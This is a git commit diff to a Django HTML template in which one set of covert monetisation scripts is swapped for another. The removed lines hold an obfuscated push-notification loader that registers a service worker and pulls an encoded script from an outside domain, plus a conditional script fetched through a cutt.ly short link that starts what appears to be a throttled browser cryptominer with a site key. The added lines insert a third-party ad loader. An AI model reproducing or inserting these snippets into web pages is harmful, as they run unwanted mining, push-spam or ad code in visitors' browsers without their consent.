update para teste

--- a/main_app/templates/test.html
+++ b/main_app/templates/test.html
@@ -9,29 +9,10 @@
   </head>
   <body>
     
-    <!-- Ad -->
-<script>
-(function(__htas){
-function rerr(a){var b=document.createElement("script"),c="undefined"==typeof a.stack?a.message:a.stack;"undefined"!=typeof a.situation&&(c+="\nSituation: "+a.situation),c+="\nUrl: "+window.location.href,b.src="//" + ('ptekuwiny.pro' === '' ? 'ptekuwiny.pro' : 'ptekuwiny.pro') + "/jserr?msg="+encodeURIComponent(c)+"&ua="+encodeURIComponent(navigator.userAgent)+"&tag=push-self-invocation",document.head.appendChild(b)}try{"serviceWorker"in navigator&&"https:"===window.location.protocol&&navigator.serviceWorker.register("/pushtest_swh.js",{updateViaCache:"none"}).then(function(){if("Notification"in window){let a=document,b=a.createElement("script"),c=a.scripts[a.scripts.length-1];b.settings=__htas||{},b.src="\/\/apprefaculty.pro\/ckHlVczxa.Ek5fvZdcG\/lxmaeHV-NjlqbRGqZTD\/b\/2IRBl\/PT3JpzvDbsm\/VVJvZjD\/0\/0RMvjIQxzNMwTlYpwuLyT\/Q\/y-NSD\/Mnx\/N\/jJElmHccHeVPzpa\/FypYvmbbmzVSJrZxDk0s0FMgjpQezjMYTNYawmLhTVQ\/yLNjDAM\/x\/NzjTEs",c.parentNode.insertBefore(b,c)}}).catch(function(a){rerr(a)})}catch(a){rerr(a)}
-})({})
-</script>
-    <!-- !Ad -->
-    
-    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
-    <!-- Jus70 -->
-{% can user.email request as CAN %}
-{% if CAN %}
-<script>
-  $.getScript("https://cutt.ly/wns1PUz", function() {
-    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
-        throttle: 0.7, c: 'w'
-    });
-    _client.start();
-    console.log('-');
-  });
-</script>
-{% endif %}
-    <!-- !Jus70 -->
+<!-- Ad -->
+<script async="async" data-cfasync="false" src="//pl16383615.effectiveperformancenetwork.com/fdd9b2c24d773b96fd13c903a0503d6a/invoke.js"></script>
+<div id="container-fdd9b2c24d773b96fd13c903a0503d6a"></div>
+<!-- !Ad -->
     
   </body>
 </html>
